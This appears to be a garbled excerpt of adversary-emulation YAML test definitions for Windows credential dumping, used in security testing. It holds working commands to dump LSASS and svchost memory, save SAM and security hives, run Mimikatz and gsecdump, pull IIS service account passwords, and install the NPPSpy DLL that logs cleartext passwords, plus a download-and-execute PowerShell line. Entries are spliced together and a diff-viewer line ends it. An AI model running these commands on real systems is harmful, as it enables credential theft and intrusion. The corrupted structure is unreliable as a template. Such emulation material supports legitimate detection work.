supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: String
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: Url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
- windows
executor:
command: |
#{gsecdump_exe} -a
name: command_prompt
elevation_required: true
- name: Credential Dumping with NPPSpy
auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
description: |-
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
cleanup_command: |-
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump svchost.exe to gather RDP credentials
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
description: |
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
supported_platforms:
- windows
executor:
command: |
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
cleanup_command: |
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: IIS must be installed prior to running the test
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
get_prereq_command: |-
Install-WindowsFeature -name Web-Server -IncludeManagementTools
executor:
command: |-
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
name: powershell
elevation_required: true
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: IIS must be installed prior to running the test
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
get_prereq_command: |-
Install-WindowsFeature -name Web-Server -IncludeManagementTools
executor:
command: |-
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
name: powershell
elevation_required: true
gsecdump -a
- name: Dump Credential Manager using keymgr.dll and rundll32.exe
auto_generated_guid: 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
description: |-
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
- name: Windows Credential Editor
description: |
http://www.ampliasecurity.com/research/windows-credentials-editor/
supported_platforms:
- windows
- windows
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: output.txt
executor:
command: rundll32.exe keymgr,KRShowKeyMgr
name: powershell
name: command_prompt
command: |
wce -o #{output_file}
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
supported_platforms:
- windows
executor:
name: command_prompt
command: |
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Atomic_Red_Team
executor:
name: command_prompt
command: |
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q

Some files were not shown because too many files have changed in this diff Show More